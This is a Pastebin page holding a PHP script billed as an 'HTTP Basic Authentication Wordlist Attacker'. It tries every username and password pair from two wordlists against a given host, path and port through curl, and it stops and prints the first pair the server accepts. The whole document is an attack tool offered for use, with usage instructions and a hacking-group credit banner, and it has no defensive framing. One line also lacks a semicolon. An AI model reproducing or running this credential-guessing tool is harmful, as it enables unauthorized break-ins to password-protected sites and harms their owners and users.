Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $userlist = @$argv[1];
- $passlist = @$argv[2];
- $host = @$argv[3];
- $path = @$argv[4];
- $port = @$argv[5];
- echo "
- ------------------------------------------------------------------------
- ::: ::: ::: ::::::::::: ::: :::
- :+: :+: :+: :+: :+: :+: :+:
- +:+ +:+ +:+ +:+ +:+ +:+ +:+
- +#++:++#++: +#+ +:+ +#+ +#++:++#++
- +#+ +#+ +#+ +#+ +#+ +#+ +#+
- #+# #+# #+# #+# #+# #+# #+#
- ### ### ######## ### ### ###
- :::::::::: :::::::: ::::::::: :::::::: ::::::::::
- :+: :+: :+: :+: :+: :+: :+: :+:
- +:+ +:+ +:+ +:+ +:+ +:+ +:+
- :#::+::# +#+ +:+ +#++:++#: +#+ +#++:++#
- +#+ +#+ +#+ +#+ +#+ +#+ +#+
- #+# #+# #+# #+# #+# #+# #+# #+#
- ### ######## ### ### ######## ##########
- HTTP Basic Authentication Wordlist Attacker
- Coded by zeN @ DarkCode.me - DUSecurity.com - EngimaGroup.org
- Usage : php auth-force.php <userlist> <passlist> <host> <path> <port>
- ------------------------------------------------------------------------
- ";
- if(!$userlist || !$passlist || !$host || !$path || !$port) { die("[-] Incorrect Arguments, Exiting...\n"); }
- echo $userlist;
- $user = file($userlist);
- $pass = file($passlist);
- echo "[+] Starting Cracker...\n";
- foreach($user as $username) {
- $username = substr_replace($username ,"",-2);
- foreach($pass as $password) {
- $password = substr_replace($password ,"",-2);
- $data = CheckLogin($host, $path, $username, $password);
- $resu = CheckResult($data);
- if($resu == true) {
- echo "\n[+] $username : $password\n";
- die ("[+] We have a login captain!\n");
- } else {
- echo "[-] $username : $password - Incorrect!\n";
- }
- } // End of the $password loop.
- } // End of the $username loop.
- function CheckLogin($host, $path, $user, $pass) {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL,$host.$path);
- curl_setopt($curl, CURLOPT_USERPWD,"$user:$pass");
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- $data = curl_exec($curl);
- curl_close($curl);
- return $data;
- }
- function CheckResult($data)
- {
- if(strstr($data,"301 Moved Permanently")) { return false; }
- else if(strstr($data,"401 Authorization Required")) { return false; }
- else if(strstr($data,"404 Not Found")) { die("\n[-] We received a 404. Please check your settings!") }
- else { return true; }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement